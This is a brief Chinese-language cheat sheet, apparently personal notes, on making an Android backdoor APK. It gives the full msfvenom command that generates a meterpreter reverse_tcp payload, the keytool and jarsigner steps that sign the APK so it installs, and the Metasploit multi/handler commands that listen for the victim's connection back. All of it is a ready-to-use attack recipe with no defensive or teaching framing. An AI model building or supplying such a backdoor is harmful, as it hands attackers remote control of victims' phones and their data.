Android,apk制作方法
1、msfvenom --platform Android -p android/meterpreter/reverse_tcp LHOST=192.168.2.248 LPORT=55556 R > backdoor.apk
2、keytool -genkey -v -keystore my-release-key.Keystore -alias android_backdoor -keyalg RSA -keysize 2048 -validity 10000
3、jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore backdoor.apk android_backdoor
4、jarsigner -verify -verbose -certs backdoor.apk
监听方法:
#msfconsole
>use exploit/multi/handler
> show options
>set PAYLOAD android/meterpreter/reverse_tcp
PAYLOAD => android/meterpreter/reverse_tcp
> show options
>set LHOST 192.168.2.248
LHOST => 192.168.2.248
> set LPORT 55556
LPORT => 55556
msf exploit(multi/handler) > exploit